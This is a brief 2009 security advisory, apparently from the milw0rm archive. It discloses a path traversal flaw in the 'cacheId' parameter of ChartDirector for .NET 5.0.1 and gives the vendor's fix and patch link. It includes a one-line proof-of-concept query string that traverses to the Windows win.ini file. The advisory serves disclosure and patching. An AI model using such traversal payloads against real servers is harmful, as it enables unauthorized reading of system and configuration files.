====================================================
Advisory No.: ISNSC-0910
=============
ChartDirector Critical File Access
Information
======
Author: DokFLeed
Program Affected: http://www.chartdir.com for .NET
Version: 5.0.1
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random
Program Description
==================
Widely used Chart Component on Financial & Stock Trading websites
Overview
=========
The query variable "cacheId=" is not sanitized, it will can allow critical files download
Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini
Solution/Fix
============
Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip
Vendor Status
============
The problem you mentions affect ChartDirector for .NET.
The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET.
For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
http://www.advsofteng.com/netchartdir501p2.zip
Reference
============
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48
# milw0rm.com [2009-09-09]
